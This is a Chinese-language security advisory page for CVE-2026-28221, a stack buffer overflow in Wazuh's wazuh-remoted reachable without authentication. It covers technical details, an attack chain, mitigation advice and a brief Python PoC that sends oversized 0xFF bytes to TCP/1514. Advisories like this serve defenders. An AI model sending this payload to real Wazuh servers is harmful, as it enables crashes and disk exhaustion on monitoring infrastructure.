CVE-2026-28221 CVSS 6.5 中危

CVE-2026-28221 Wazuh远程栈缓冲区溢出漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-28221

漏洞类型

栈缓冲区溢出

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Wazuh

漏洞概述

Wazuh在4.8.0至4.14.4之前的版本中存在栈缓冲区溢出漏洞。该漏洞位于wazuh-remoted组件的print_hex_string函数中，由于特定平台下的符号扩展导致格式化输出异常长度。未经认证的远程攻击者可通过TCP/1514端口发送特制数据包触发该漏洞，导致越界写入或日志放大攻击。

技术细节

该漏洞源于wazuh-remoted中print_hex_string函数使用sprintf格式化字节。在char为有符号类型的平台上，输入字节0xFF会被符号扩展为0xFFFFFFFF，导致sprintf输出8个字符而非预期的2个字符。这会覆盖固定大小为2049字节的栈缓冲区边界。攻击者无需认证，只需向TCP/1514端口发送带有超长前缀的消息即可触发。此外，该路径还会将攻击者控制的数据记录到日志中，造成磁盘和I/O资源耗尽。

攻击链分析

STEP 1

步骤1

攻击者扫描目标网络，寻找开放TCP 1514端口的Wazuh服务器。

STEP 2

步骤2

攻击者向Wazuh服务器发送特制的TCP数据包，其中包含导致符号扩展的字节（如0xFF）和超长长度前缀。

STEP 3

步骤3

服务器处理数据包时触发print_hex_string函数中的缓冲区溢出，或因日志放大导致资源耗尽。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# Target IP and Port
target_host = '192.168.1.10'
target_port = 1514

# Create a malicious payload
# The bug is triggered by bytes >= 0x80 (e.g., 0xFF) due to sign extension
# Sending a large packet to trigger the overflow in the hex dump path
payload = b'\xFF' * 3000

try:
    # Connect to the wazuh-remoted service
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    s.connect((target_host, target_port))
    
    # Send the payload
    # Note: The protocol requires a specific header format to reach the vulnerable path,
    # but the oversized payload itself usually triggers the diagnostic path.
    s.send(payload)
    
    print("Payload sent successfully.")
    s.close()
except Exception as e:
    print(f"Error: {e}")

影响范围

Wazuh >= 4.8.0, < 4.14.4

防御指南

临时缓解措施

建议立即升级到修复版本4.14.4。若暂时无法升级，应严格限制TCP/1514端口仅允许内网受信任的Agent IP连接，防止外部未经认证的攻击者利用此漏洞。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表